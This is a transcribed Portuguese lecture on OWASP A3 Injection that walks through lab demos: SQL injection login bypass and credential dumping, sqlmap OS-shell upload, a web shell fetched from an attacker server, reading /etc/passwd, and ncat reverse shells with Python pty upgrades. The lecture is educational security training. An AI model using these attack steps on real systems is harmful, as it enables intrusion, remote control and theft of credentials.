Então vamos levar. Vamos falar aqui um pouco de OASP A3 2021, né? A OASP ela vem se atualizando de 4 em 4 anos. Ela começou em 2017, teve em 2017, né? Depois teve em... Ei, até me atrapalhei. 2021 agora, injeção. A gente vai levar aqui um pouquinho. Aqui um pouquinho de quem sou eu. Depois, quem não souber quem sou eu, lê um pouquinho aí, sabe quem sou eu. A gente vai falar de injeção. Em 2017, a injeção ela estava como top 1. Em 2021, ela foi para top 3. E também foi introduzido aqui o XSS, que em 2017 era o top 7. Foi introduzido aqui no caso da injeção. Fraquezas comuns, cross-site script, SQL JET, controle externo de nome, de caminho ou nome, né? Um aplicativo é vulnerável ao ataque quando dados fornecidos pelo usuário não são validados, filtrados ou higienizados pela aplicação. A injeção SQL é uma vulnerabilidade da web que permite que o invasor interfira em consultas que um aplicativo faz no banco. Geralmente, permite que o invasor visualize dados. Isso pode incluir dados pertencentes a outros usuários ou qualquer dados que o próprio usuário possa acessar. Em muitos casos, o invasor pode modificar ou excluir, causando alterações persistentes no conteúdo ou comportamento do aplicativo. Pessoal, está todo mundo me escutando até agora? Aí, a gente continuar. Tudo ok, perfeito. Beleza, vamos continuar então aí. Vamos levar. Então aqui a gente tem um pseudocódigo, que é uma autenticação, onde é passado um PERT, uma requisição em PERT, onde é requisitado um username e um password. E a gente tem uma query em SQL, no SQL, né? E esse username e esse password é passado diretamente para a query, no caso aqui. E depois de passado para a query, não tem nenhum tratamento e é executado para o nosso banco de dados. E o nosso atacante pode ir lá, né? O nosso código. A gente tem o nosso username e o nosso password. O nosso atacante, no caso aqui, a gente está fazendo uma autenticação, então ele pode fazer um bypass authentication, ou quebrando aqui no username, quebrando aqui, ele pode quebrar aqui. Ele pode usar esse OR aqui dentro do username, só que ele teria que usar o OR e quebrar o restante da aplicação, botando ali, comentando o restante da aplicação, botando ali um jogo da velha, não, até esqueci o nome até esqueci agora o nome do coisa, mas um jogo da velha não, enfim, deixa eu mostrar aqui agora qual seria esse aqui, né? No caso aqui, eu até esqueci o nome dele aqui agora. Seria esse aqui, no caso. A gente comentaria ou faria isso aqui. Comentaria o restante da aplicação, dependendo da nossa aplicação, se for um SQL ou dependendo do nosso banco, a gente continuaria, digamos assim, usaria o username. No caso aqui, a gente colocaria qualquer coisa no username, aqui nesse payload que ele está botando aqui, ó. 1 igual a 1, ou seja, qualquer coisa no username ou 1 igual a 1, ou seja, ele quebra a aplicação na lógica da aplicação. A gente tem uma aplicação aqui no teste PHD Evon, né? Vou mostrar lá na prática. O que seria essa parte da bypass authentication, né? Só logar aqui, calma aí. Isso aqui. No caso aqui, a gente tem uma aplicação que tem uma
autenticação, como eu mostrei lá no código, onde é passado um username, onde é passado um password, e a gente tem um payload aqui, nesse caso aqui, que ele diz o quê? Que diz qualquer coisa ou 1 igual a 1. Se eu fosse botar aqui no username, eu teria que colocar quebrar aqui no final, ou fazer isso aqui para terminar a aplicação. Como eu não estou passando nada aqui, no caso aqui, vou só logar, mostrar para vocês. E aí autentica. Normal, então ele quebra a lógica da aplicação só com um bypass de autenticação. Está mostrando. A aplicação. Os tipos de SQLi que a gente tem Union-Base, SQL Injection, é um tipo chamado de SQL in-band, que usa o operador Union para extrair facilmente informações pretendidas da base de dados. O Union permite utilizar simultaneamente e extrair múltiplas tabelas. A gente tem o erro base, que o hacker, no caso, potencializa a mensagem de erro devolvida pelo servidor para retirar a mensagem de informações acerca da estrutura do servidor, né? Introduz intencionalmente consultas inválidas para gerar mensagem de erro. A gente tem um time base, blind, né? Que o blind, no caso, que seria o tempo, né? Então a gente envia uma query temporizada para avaliar o resultado. A query em questão, ela irá forçar a base de dados a esperar e devolver o resultado naquele tempo que a gente espera. Às vezes ela traz um true ou um false, dependendo da base, né? Com base no tempo de resposta. A gente avalia qual foi o resultado. A desvantagem é que você tem que avaliar e numerar a base de dados caractere por caractere. A gente tem um boolean, um base, né? Ele injeta uma consulta a cega, similar ao time base, só que ao invés de rolar, de ter uma consulta com tempo, ele tem uma consulta com payload de um booleano, no caso, um true ou um false. Temos o fora da banda, que é uma técnica para gerar pedidos DNS ou HTTP e entregar diretamente ao hacker. E aqui a gente já tem, no caso, a nossa injeção SQL, no caso, utilizando um Union e utilizando também a parte de erro, né? Porque ele está gerando aqui no erro da aplicação, né? E aí eu vou mostrar aqui na prática essa parte aí. O que a gente pode extrair dessa parte do Union e o que pode ser feito um pouquinho a mais nessa parte de injeção SQL. Aplicação que ela é vulnerável, você já deve ter instalado aí. Então aqui a gente tem algumas vulnerabilidades, aqui a gente vai explorar no caso o SQL Injection. E aí a gente vai botar aqui no caso um payload. O que a gente vai fazer aqui? No caso, normalmente, quando a gente quer saber se o SQL ele é vulnerável, a gente bota uma aspa simples e manda pesquisar. Se a aplicação der um erro de SQL, quer dizer que existe uma vulnerabilidade SQL, não quer dizer que a gente possa explorar, vai depender do nosso payload, vai depender do que a gente fizer aí, né? Mas existe uma vulnerabilidade SQL. Então, normalmente a gente usa uma aspa simples. E aqui, no caso, eu vou utilizar um payload de união, dizendo aqui, ó, end 1 igual a 0, no caso aqui é um payload dizendo que de erro base, fazendo uma união, union select null, aí concatenando aqui o usuário e o password dividido por ponto e vírgula from uses, no caso da tabela uses. E aí aqui no caso eu tenho todos os usuários e
usuários e as senhas dos usuários por um SQL injection, não é? No caso. Deixa eu mostrar ali. Vamos seguir ali a coisa para ver se a gente segue. Então vimos aqui que a gente pode concatenar usuários utilizando a união select null, concatenando o usuário, password, e aí from usuários, from users, no caso da tabela users. No caso ele vai trazer aqui todos os usuários da tabela users. Aqui a gente tem uma injeção time base, que a gente tem um SQL injection no tipo de tempo, onde a gente aqui ele está perguntando, a aplicação em si está perguntando user ID, submit, no caso eu estou botando aqui o user ID 1, o meu user ID é 1, se eu submeter, ele me dá uma resposta, mas se eu aplicar uma injeção SQL, onde eu use o end sleep 5, no caso que eu espere um tempo de 5 segundos, ele vai me trazer uma resposta. O blind, no caso aqui, as cegas, quer me dizer isso, porque ele não vai me trazer uma informação que nem eu trouxe um SQL injection uma vez passada, que ele me trouxe a resposta, me trouxe o username, me trouxe ali as senhas do usuário. Como ele é um blind SQL, ele vai me trazer uma injeção a cega, ele vai dizer que o usuário existe, e aí como a gente vai ver aqui no próximo payload, aqui no 100 sleep, ele vai dizer que o usuário não existe. Ou então, como é a cega, ou ele vai dizer uma coisa ou outra. Se for no caso do Boolean Base, ele vai trazer ou verdade ou falso. Aqui a gente tem alguns payloads de SQL Injection, payloads genéricos. Aqui alguns outros payloads genéricos também, que de erro base. Aqui a gente tem alguns payloads de time base, onde tem sleep, backman, a gente tem também delay. Alguns payloads de união, alguns payloads de bypass authentication, onde a gente quebra a autenticação. Então, no caso aqui a gente utilizou esse bypass aqui para quebrar a autenticação lá da aplicação. A gente tem o Google SQL Docs, o Google Hack, também chamado de Google Docs, é uma técnica que é usada por buscas, que usa o Google Busca e outras aplicações do Google para encontrar brechas de segurança na aplicação, em seu código, né? Na configuração e em seu código do seu site. O Google Docs também pode ser utilizado para o Cint, né? Aqui alguns docs top 2021 para SQL Injection. A gente tem o SQL Injection automatizado, o SQL Map é uma ferramenta de código aberto, automatiza o processo de detecção, exploração e fase de injeção SQL, controle de servidores de banco de dados. Ele vem com um poderoso mecanismo de detecção, muitos recursos de nicho para testadores de penetração e uma ampla gama de opções que vão desde coleta de impressões. Tudo certo aí? Tudo certo aí? Acho que alguém entrou com um áudio. Tudo certo aí, pessoal? Agora sim. Vamos seguir, vamos voltar aqui. Então, o que é o SQL, o SQL Map, né? É um SQL Injection automatizado, é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção, exploração e falhas de injeção SQL e controle de servidores de banco de dados. Ele vem com um poderoso mecanismo de detecção, muitos recursos de nicho de testador de penetração e uma ampla gama de opções que vão desde coleta de impressões digitais a acessar sistemas de arquivos e executar comandos dos sistemas operacionais, como a gente vai ver aqui na frente. A gente viu até agora o SQL Injection como apenas uma coisa que a gente viu, banco de dados, mas a gente vai ver essa parte aqui agora de tanto de acesso a arquivos como execução de comandos no sistema operacional. Aqui
A gente tem o SQL já de comando, no caso aqui, até o dump, aqui a gente tem uma parte de get, requisições de get, né? Isso aqui está até lá no meu script, eu peguei no meu script lá aquele meu script maior lá. E aí aqui o restante é a parte de dump, de post, né? Na parte de post. Lá em cima é a parte de get, aqui da parte de post. Então, no SQL Map, a gente tem os dump scripts. O que são os dump scripts? São os bypasses de WAF, né? Então, a gente vai falar aqui de MySQL, vamos falar um pouco de Tamper, vamos falar aqui do Shellcode, um dos scripts de Tamper que a gente vai falar. O Shellcode ele é feito em Python, e tem a função de encode, ele utiliza algumas plataformas de MySQL 2005, MySQL 4, 5 e 5.5, Oracle 10G e PostgreSQL. O comando que ele utiliza é o Select Field from Table. Eita, passou. E aí, o encode dele, no caso, é esse encode aqui. Uma função dele é encodar essa requisição SQL aqui. Aí a gente vai passar para a prática agora aqui. Vamos lá para a prática. Eu gosto, né? E aqui a gente, como eu mostrei agora, como a gente quebrar uma aplicação, normalmente a gente digita uma aspa simples, e aí a gente verifica que a aplicação mostra para a gente. No caso aqui ela mostrou uma requisição SQL. E aí aqui eu interceptei com burp, como eu vou mostrar aqui. Um SQL, eu vou digitar qualquer coisa. Eu vim aqui com o meu burp, vou interceptar essa requisição. Tá, eu vou mostrar aqui. Interceptar com o burp. Chegou aqui no burp. Eu vou pegar essa requisição aqui, vou colar. Já estou logado aqui no burp, eu já tenho aqui o meu... Mostrando aqui para vocês o meu burp. Vou mostrar aqui no terminal que é mais fácil. Eu vou colar aqui essa requisição. Vou chamar de SQL6. Vou colar aqui. Então tem uma requisição já feita aqui, onde ele já tem um cookie aqui. Esse cookie, ele é um cookie de autenticação, ele que vai autenticar na aplicação. Se eu não tivesse esse cookie, ele não ia autenticar na aplicação e não ia funcionar. E aí o que eu vou fazer com esse cookie, né? Vou chamar o SQL, né? SQL, no caso aqui, SQL map, -r, vou chamar meu cookie. Alguma outra coisa aqui, acho que eu não preciso passar nada. Ah tá, no caso aqui eu chamei a OSS Shell. Aqui eu chamei o OSS Shell já para chamar Shell da aplicação. E aqui no caso ele vai me perguntar qual o tipo de Shell que eu quero upar. No caso aqui eu quero upar uma Shell PHP. Vou botar aqui em 4. Ele perguntar aqui se eu quero procurar o patch, eu não quero procurar patch nenhum. E aí se ele vai perguntar se eu quero fazer um brute force na aplicação, se eu quero botar algum local que eu quero upar essa shell. No caso aqui eu vou botar que é o common location, no caso aqui eu vai no /w, var www, http no caso, alguma dessas aplicações.
E aí ele vai tentar upar lá. E aí ele upou lá, conseguiu upar a Shell. Teve sucesso. Ele upou a Shell com esse nome aqui, ó. Lá dentro da raiz. E se eu der um ls aqui, eu já estou dentro do servidor. Eu preciso dar um yes aqui, então, porque ele não é uma shell interativa. E aí, agora a gente vai para uma outra parte que seria upar uma shell interativa, né? Para a gente upar uma shell interativa, eu vou precisar usar o meu servidor aqui, um servidor atacante, né? O meu servidor atacante, para me upar uma shell interativa, tem aqui, no caso aqui, eu tenho uma WSO PHP, é uma web shell. Vou upar aqui o meu servidor Python, Python-m de módulo. E aí eu vou acessar o meu módulo http.server. Eu vou levantar um servidor web, aonde eu vou levantar na porta 9393. Então ele vai levantar um servidor web, vai estar esperando aqui na porta 9393. A minha internet tá o. Tô aqui no outra shell aqui do lado, né? No caso aqui, como eu tô com a shell aqui do lado aqui, eu vou precisar upar aqui um arquivo aqui nesse aqui. Eu vou dar um wget -n. Não quero fazer nada disso. Wget -n. Só muta aí quem tá no microfone aí, por favor. Tá tudo certo aí, pessoal? Estão vendo aí? Tudo certo aí? Até agora? Tudo certo. Beleza. Vamos lá. Então, eu levantei aqui na minha parte do ataque. Eu já entrei aqui. No caso, eu já explorei uma vulnerabilidade SQL. Já tô com o shell dentro do servidor. Já entrei com o shell dentro do servidor. Eu já não tô mais com aquela negócio somente o nome de usuário. Tô com lá, já tô com uma shell dentro do servidor. Consegui upar uma shell dentro do servidor. Então, a partir daqui, já é uma pós-exploração. Já quero melhorar essa minha shell para mim ter um acesso no servidor de uma forma melhor. Porque se eu quero dar um ls, o servidor me pergunta se eu quero yes, se eu quero dar um ls, enfim, qualquer comando que eu for executar, o servidor vai me perguntar se um yes. Não é uma shell interativa. Para a gente melhorar essa shell, é uma shell, na verdade, essa já é uma parte de pós-exploração, né? A gente vai upar aqui uma shell, uma web shell. E depois dessa web shell, a gente vai fazer um reverse shell. Depois desse reverse shell, se precisar, a gente melhora essa shell. Então, para a gente fazer isso, a gente vai dar um wget -n. Vamos chamar aqui http /var 172.17. Deixa eu ver qual é o IP aqui. Deixa eu ver qual é o IP aqui. Sai sacanagem. Ah, 1701. Então, 1701. Na verdade, ali eu tô com 17. Também continuo 1701. Porque aqui, ó. Aqui pode ser um pouquinho confuso a parte de IP, porque como eu estou levantando aqui meus laboratórios todos em container, em Docker, quando eu faço uma
tipo assim, eu direciono a porta do container para a porta do meu servidor aqui, no caso do meu IP, ele vai logar tudo com o mesmo IP. No caso aqui, se eu tiver 192, 168, alguma coisa, todos os meus containers vão responder por isso, mas também vão responder por 172. Então pode ser um pouquinho confuso. Então, ele vai responder por 171, no caso aqui, pela porta que eu estou chamando aqui do container, no caso aqui, 9393. E aí o arquivo que eu quero baixar, wso.php. Yes. Pronto, baixou meu novo arquivo. Achou aqui também, tá? Achou aqui meu arquivo. Aliás, tá no minha WSO aqui. E aí, a partir daqui a gente pode chamar a nossa WSO, no caso, né? Que no caso a nossa execução de SQL. Deixa eu ver só onde essa bicha tá. Então, WSO tá lá no www. A www deve estar bem aqui, cara. Só carregar aí. Meu burp tá sacaneando aqui. Não. Deixa eu ver onde ela pôr aqui. Tá me sacaneando, que ela pôr bem aqui. Isso tá. Outro lá na raiz, sacaneando, então tô aqui. Aqui então, o meu web shell, vou até dar um logout aqui para vocês verem como é que funciona essa web shell. Então, chamou aqui minha web shell, conseguiu upar, né? E aí ela tem uma senha aqui de Ghost 287. Ela é uma web shell completa, onde você pode navegar entre arquivos, pode ter o console para digitar comandos, né? E aí também a gente tem uma outra parte aqui de web, que a gente consegue fazer um shell reverse. É isso que a gente vai mostrar aqui. Aqui a gente tem uma web shell. Aqui a gente upou a nossa web shell, né? Chamamos aqui nosso web shell, onde foi upado lá para o servidor. Enfim, upei. A gente upamos lá para o servidor. E aí a gente chamou, conseguimos upar para lá no caso. E aí a gente vai fazer agora um reverse shell, onde a gente vai chamar o ncat, fazer um nlvp para escutar, e a porta que a gente vai escutar é na 31337. A gente vai ficar escutando. E aí a gente vai chamar aqui na nossa aplicação a porta 31337, e aqui o nosso servidor é o 200. E aí a gente recebe a nossa shell aqui. E aí que a gente já está dentro do servidor, no caso.
Aqui vai da opção do atacante, né? Só mostrando aqui. Enfim. Saindo. Saindo aqui. E vamos continuar lá o slide. Então aqui a gente... O que a gente fez? Vamos voltar lá. A gente interceptou o burp. Uma requisição. Essa requisição é essa requisição aqui. E aí a gente veio na aplicação aqui, ó. Chamado SQL6. Aquela requisição. Ela só funciona porque ela tem um cookie. Se não tivesse cookie, não ia funcionar. Então, a gente interceptou, criamos essa requisição, subimos um servidor em Python. Depois que a gente, na verdade, utilizou aqui o SQL Map, né, com -R e o S Shell, né, depois que a gente pegou a Shell, a gente utilizou aqui para subimos o servidor e upamos uma outra Web Shell, no caso aqui, com wget-n, upamos uma outra Web Shell. Depois dessa outra Web Shell que a gente acessou, a gente pegou uma Shell reversa. E a gente vai ver agora uma forma de ler arquivos com SQL Injection. No caso aqui, a gente continua com SQL Injection, só que agora a gente vai ler um arquivo utilizando um SQL Injection, né? Aqui a gente tem um SQL, e aí a gente vai utilizar um payload. No caso aqui a gente vai dizer, ó, union load file. No caso aqui a gente vai ler o etc pswd e no final a gente vai comentar tudo que tiver que comentar. E aí a gente consegue ler o arquivo pswd. Nesse caso aqui, a vulnerabilidade ela só consegue ler arquivos que o usuário, no caso aqui, o usuário www, ele consegue ler. Se eu tentar ler aqui, hoje em dia, no caso aí para quem é mais novo aí no Linux aí, antigamente o pswd é utilizado como senha de usuários. Hoje em dia existe dois arquivos, existe o pswd, existe o Charles, no caso aí, e aí no caso aqui, se a gente tentar ler um arquivo Charles, a gente não consegue ler porque a gente não tem permissão de leitura, a gente só tem permissão de leitura do www.data. No caso aqui, mostrei como ler um arquivo. Aqui essa outra parte que eu vou mostrar como criar um arquivo, né? A gente vai utilizar união também. No caso aqui a gente vai utilizar união e vamos escrever esse código PHP aqui, no caso PHP System, a chamar um comando get. E aí aqui o into file, a gente vai dizer aonde a gente quer escrever o arquivo. E esse jogo da velha, no caso aqui, a gente comenta no caso o restante da aplicação. No caso aqui, como eu falei, a gente usa a união, escrever um arquivo. Aqui a gente bota o nosso payload e aonde a gente quer escrever o nosso arquivo. Vou chamar de Shell 5, porque eu já escrevi algumas aqui. Deu um erro aqui, então não conseguiu ler.
Não, o que faltou aqui foi o quê? Foi isso aqui. Conseguiu escrever lá? E aí ele escreveu aqui nessa URL. Não, deixa eu ver aqui. Foi lá na raiz. Na raiz, então, a gente vai chamar um shell 5. PHP. E aí, chama um shell 5 aqui que a gente acabou de criar. Ele está dizendo um alerta aqui que ele precisa de um comando do sistema, porque ele é um comando do sistema, né? Então, a gente digitou lá que a nossa, no caso aqui, só mostrando aqui para vocês, digitamos aqui, ó. A gente vai chamar um get em CMD, vou chamar um CMD aqui, ó. Então, a gente escreveu um arquivo, o que a gente fez, concatenou, no caso aqui, deu um aspas simples, union 1, e aí escreveu esse arquivo aqui, na verdade, essa frase aqui, dentro de um arquivo, chama shell 2, no caso aqui eu chamei de shell 5, que está dentro de www.data. Foi isso que a gente fez. Aí aqui ele chama, complementando, ele chama aqui, no caso, ele chama CMD como um argumento. Então aqui eu chamei a shell 5, vou dar um igual, vou chamar um CMD, e aí eu vou chamar o meu código que eu quero chamar. No caso aqui eu quero chamar um ls. Aí eu tenho aqui, ó, se eu ver o meu código fonte, eu vejo de uma forma melhor que meus arquivos. No caso aqui eu já estou executando o código do sistema. Se eu executar aqui, ó, ls menos ali h barra, eu já vejo aqui no caso todos os arquivos do meu sistema, permissões de arquivos de sistema. Aqui no caso eu já estou executando o código, né? Aqui eu já poderia chamar um ncat, chamar o meu 192, 168.0.200, chamar o meu 444, chamar o meu -e e dizer que eu quero um barra bin, barra bash, por exemplo. E aqui eu já espero minha shell reversa aqui, ó, ncat menos nlvp, no caso ali 444, já fico esperando a minha shell reversa. Aí mandou aqui, eu já tô ali. E aí aqui eu já tô na parte de uma shell totalmente diferente do que aquela que a gente pegou ainda agora, porque é uma shell totalmente não interativa. Se a gente quiser melhorar, certo aí, pessoal? Certo. Então, aqui a gente está numa shell não interativa, então aqui já é uma parte de pós-exploração, você já explorou a aplicação, você já está dentro da aplicação, então aqui eu já vou fazer uma parte de pós-exploração. No caso aqui, eu já vou melhorar a minha shell, já uso o Python, -c de command, já importo o PTY, no caso do meu terminal, né? Eu uso o span e aí eu chamo meu /bin /bash. Aí agora eu já tenho uma shell interativa, totalmente dentro do sistema. No caso de SQL Injection. Tá, vamos passar para Code Injection, né? O ASP define injeção de código como termo geral, qualquer tipo de ataque que consiste em injeção de código, então interpretado e executado pelo aplicativo. Esse tipo de ataque explora o mau manuseio dos dados não confiável. Esse tipo de ataques geralmente são possíveis devido à falta de validação adequada dos dados de entrada e saída, caracteres permitidos, expressões regulares, padrões e personalizados, padrões no caso. Formatos de dados, quantidade de dados esperados, né? A injeção de código é diferente da injeção de comando.
na forma, na forma que o invasor é limitado apenas pela funcionalidade da própria linguagem injetada. Se o invasor pode injetar código PHP em um aplicativo, então ele apenas é limitado por aqueles recursos do PHP. A injeção de comando consiste em aproveitar o código existente e executar comandos. Código inject um PHP, onde ele é passado uma função eval, onde essa função eval ela pega uma requisição, no caso um valor, né, que não é higienizado pela aplicação. O invasor que esteja ciente dessa função eval, que pode ser revelada através de uma mensagem de erro, pode enviar uma seguinte exploração, né? Ele pode quebrar, no caso aqui, a aplicação utilizando um ponto e vírgula. Qualquer coisa que você já tenha programado para cá, ele vai quebrar com ponto e vírgula. No caso, o ponto e vírgula, ele vai fazer um próximo comando. No caso aqui, eles chamam um comando de PHP info. Ele injetou um código gético de PHP e chamou PHP info. No caso aqui embaixo, ele já chamou um system e já injetou um comando do sistema na aplicação. A gente tem aqui uma aplicação, no caso que ela aceita code injection, né? Eu vou mostrar aqui um pouquinho dela. A gente tem aqui um code injection, né? E aqui a aplicação, no caso aqui, ela tem um ping, né? Então ela dá um ping em qualquer IP, no caso aqui, o cara que desenvolveu, no caso o desenvolvedor, no caso ele pensou que somente podia ser utilizado ali um IP para a pessoa botar um IP ali e fazer um ping, né? Só que ele nunca pensou que uma pessoa podia botar um ponto e vírgula e digitar qualquer comando, né? Sistema operacional. Aí, no caso aqui eu utilizei um ls, né? E aí também a gente pode fazer qualquer enumeração do sistema operacional, né? E a gente pode fazer um dpkg, por exemplo, "-l", e ver tudo que está instalado no sistema operacional aqui no caso. E aí vem se a gente tem alguma coisa interessante aqui no sistema operacional, ou se a gente pode fazer aqui no caso aqui e ver se a gente tem um eles. A gente pode fazer um e3 e a gente chamar um Unicat da vida, ver se a gente tem um Unicat. E aí a gente vê aqui que a gente tem um Unicat. Então, se a gente tem um Unicat, para que eu vou bater cabeça, né, mano? Você já tem um Unicat lá, é só fazer um reverso e aí acabou. Vamos fazer um reverso. Já chama o reverso aqui, ó. Unicat, meu IP, a porta, -e, o /bin /bash, ou seja, quando eu conectar naquele servidor, naquela porta, eu envio meu /bin /bash. E aí eu venho aqui para o meu servidor do atacante. Meu servidor atacante, no caso aqui, né? Tem que sair daquele cara lá, que eu não tô naquele cara lá, né? Ah, tá bom de tá bom de shell. Aí eu fico esperando de novo. Unicat -nlvp. E aí a porta que eu quero conectar, 444. E aí fico esperando a minha shell. E aí chama a minha shell. E aí eu já tô aqui dentro de novo no servidor. Pronto, só o comando injection. Code injection, né? No caso aqui, a gente injetou código do sistema. Na verdade eu estava falando de code, né? E aí botei o comando injection. Na verdade eu troquei as bolas aqui. Mostrei o command injection, né? Na verdade eu estava falando de code injection. Se eu estava falando de code injection, eu tenho para esse cara aqui, ó. Tenho para esse cara aqui.
E aí tem que chamar meu PHP, code injection, hack, chame o hack lá, chame minha mensagem. E aqui eu tenho minha mensagem que eu tenho no meu teste. E aqui eu posso utilizar qualquer, no caso, code para poder injetar. No caso ali eu estava injetando comando do sistema, é totalmente diferente, vou mostrar ali. Eu não sei porque eu confundi, mas eu acabei confundindo. No caso aqui eu vou ter que injetar código PHP para poder o sistema funcionar. Não funcionou? Vagabundo. Quer que eu quebre? Ô, vagabundo. Tá me sacaneando. Tá, tudo bem. Vamos aqui de novo. A mesma coisa. Não aceita o PHP aqui, ele aceita somente o system. Tá. No caso aqui eu estou chamando o system, que é uma função PHP. E aí no caso aqui eu estou chamando o ls para ler os meus arquivos que estão aqui. Ó. Eu também posso utilizar uma função que ele possa ler um arquivo. Por exemplo, não que eu não possa chamar esse arquivo aqui, ó, cat /tc /pes wd. Eu posso ler aqui também, mas eu posso chamar uma outra função que é um code injection, no caso uma função de code injection para poder ler um arquivo, entendeu? E aí nisso aqui eu queria mostrar aqui também uma parte automatizada, né? Que é uma parte automatizada disso aí. Eu vou até mostrar aqui agora no meu Discord. Vou mostrar aqui onde eu tenho aqui meu boot, né? Onde eu vou fazer uma execução de código automática. No caso aqui, vou usar um dó. Vou chamar aqui então. Foi uma parte automatizada com lá com o meu script. A parte de Docker, né? O Docker não está startado. Sudo é sacanagem. Tá, vamos ver aqui. Só não sei se tá. Deixa eu ver aqui, 6678. Ok. Start, menos A, menos start. Menos A, menos Z. 78. Aí eu tenho um script, né? O pessoal que nunca utilizou meu script vai ver hoje. Que um deles é o Hunter. Se a gente chamar ele aqui, nem tá atualizado isso aí, enfim. Tá de sacanagem. Poxa vida. Enfim, vamos criar um lado. Agora um que tá lá no Git. Um que tá lá no Git. Calma. Sacanagem. Tá me sacaneando, sabe que me sacaneia nas lives. Mas vamos criar um que tá lá no Git.
pegando o que tá lá agora. Beleza. Então tá aqui o meu script. Explicando rapidamente o que ele faz, né? Ou você enumera de um domínio único, ou você enumera de um subdomínio, ou você busca subdomínios do Chaos Projection, ou você enumera domínios e subdomínios. No caso aqui, eu só vou enumerar um domínio único, eu não quero pesquisar nada, nenhuma tecnologia, eu não quero nada. No caso aqui, eu só quero ser a mod. A permissão de execução. Vou chamar ele. Ele vai mostrar aqui como é que eu tenho que utilizar. Olha aqui, eu vou chamar Enter. Vou chamar o domínio, vou chamar o rh.business Corp, que é um domínio nosso de teste da DSEC. Vou utilizar que eu quero um domínio único, não quero que ele procure nada, de nem tecnologias, de nem nada. E aí ele vai continuar a atacar. Aqui no meu não tenho nada. Vamos ver se ele vai atacar. Não sei se ele está projetado para atacar. Vamos ver se é o final dele. E aí que extraiu tudo, procurar lá, domínio. Deixou os JSON lá, procurando os Git. Vai procurar o Git Expose. Vamos ver se ele vai injetar lá, né? Tá terminando de fazer o Ascent aqui, procurando arquivos. Vai baixar os JSON para ver se tem alguma vulnerabilidade do JSON. Vai analisar o JSON. E aí depois ele vai injetar. Se achar alguma vulnerabilidade, ele vai mostrar ali. Achou a vulnerabilidade? Já mostrou aqui no meu bot, ó. Injetou aqui no meu bot, injetou duas vulnerabilidades aqui no meu bot. E se eu abrir lá no meu bot, ele já me mostra lá meu code inject, no caso ali, no caso o meu etc PSWD. Então, code inject automatizado. Aqui a gente tem alguns payloads, tanto payload de reverse shell, como alguns outros payloads de code injection. Aqui a gente tem o ERPs, né? No caso que a gente utilizou o date para a gente fazer esse code inject automatizado. A gente utilizou esse payload aqui. A gente tem o command injection. O command injection é um ataque com o objetivo da execução de código arbitrário no sistema operacional. Até a gente até viu ainda agora, eu não sei porque pulou, mas a gente viu o code injection ainda agora. São ataques de injeção de código que são possíveis quando o aplicativo passa dados fornecidos por um usuário inseguros, formulários, cookies, cabeçalhos HTTP para um shell no sistema. Esse ataque de comandos de sistema operacional fornecido pelo invasor, geralmente são executados com o privilégio da aplicação, como mostrei ainda agora, né? Se você só vai conseguir ler um arquivo dependendo do usuário que você está nessa aplicação. Aqui a gente tem alguns command injection, payloads de command injection em Unix. Temos aqui alguns command injection de Windows, né? Aqui, como eu mostrei lá, a gente tem um command injection. Vou mostrar mais essa parte lá de command injection que eu testei. Foi uma parte bem legal que eu tinha feito lá. Eu não vi em lugar nenhum. Na verdade, eu testei por comando mesmo que eu conheço, né? Para poder fazer uma shell, uma shell somente com comandos, né? Então a gente tem aqui uma aplicação, a gente tem um comando injection, né? A gente viu que a gente tem um comando que a gente pode quebrar por ponto e vírgula, né?
para poder injetar um outro comando. No caso aqui, o que eu fiz? Pode parecer diferente de um comando injético para um quad injético, mas o que eu fiz aqui? Eu usei um command, né, que é um echo, para injetar um código. No caso aqui, eu injetei um código PHP dentro de um arquivo chamado teste.php. No caso aqui, eu vou chamar de agora PHP. Ele vai estar dentro dessa pasta aqui, ó. Eu vou submeter, eu vou escrever e vou chamar aquele agora.php. E aí, a mesma coisa que ele está esperando ele está esperando, na verdade, um comando do sistema, né? Que a gente botou lá, que é um parâmetro. O parâmetro que a gente deu é um CMD. E aí a gente pode executar código. Da mesma forma que eu mostrei agora, a gente pode fazer um reverse shell. E aí, como eu mostrei aqui, que a gente pode numerar também, se a gente tem aquele, no caso aqui eu mostrei um Alice.anycat, e aí, no caso aqui ele achou o anycat, só era para saber se nessa aplicação eu tinha um anycat. E aí aqui eu botei, no caso aqui, eu fiz um reverse, dizendo que um anycat, me conectando naquele servidor, naquela porta, e enviando o meu bash. E aí o atacante está lá só esperando, no caso, o meu bash. Como eu fiz para upar a minha shell, né? Melhorar a minha shell. Naquela hora usei um Python -c de command, importando o PTY, no caso. E aí, dando spam, /bin /bash. E aqui eu fiquei esperando e recebi minha shell. O cross-site script são um tipo de injeção que scripts maliciosos são injetados no site. Os ataques de CSS ocorrem quando o invasor usa um aplicativo web para enviar um código malicioso, geralmente na forma de um script lateral do navegador, para o usuário final diferente. As falhas que permitem que esses ataques tenham sucesso são bastante difundidas e ocorrem em qualquer lugar de um aplicativo web. Tudo certo aí, pessoal? Liga esse microfone aí. O invasor pode usar o XSS para enviar script. Desliga o microfone aí, irmão. O invasor pode usar. Opa! Posso continuar? O invasor pode usar o XSS para enviar scripts maliciosos para o usuário desavisado. O navegador do usuário final não tem como saber que esse script não deve ser confiável e executa o script para achar que é um script de uma fonte confiável. O script malicioso pode ser qualquer cookies, tokens pode ser malicioso para acessar qualquer cookies, tokens de sessão, outras informações confidenciais. Só eu tentei fazer aqui, no caso, mostrar, na verdade, uma criticidade na parte de XSS, mostrar injeção de código, né? Acabei que eu não consegui fazer um laboratório, mas eu vou mostrar aqui alguns videozinhos demonstrando isso. Aqui a gente tem um XSS refletido. O XSS refletido é um ataque quando ocorre quando um script malicioso é refletido no site. A gente utiliza uma tag, né, no caso JavaScript, e esse JavaScript reflete para a gente. Ele não tem nenhuma sanitização, né? Ele pode ser tão simples quanto criar um link e introduzir um usuário e induzir um usuário a clicar nesse link, né? No caso aqui, vou mostrar o JavaScript. Tá acabando. Tá acabando. Deixa eu ver se essa aplicação aqui também posso mostrar. Tá.
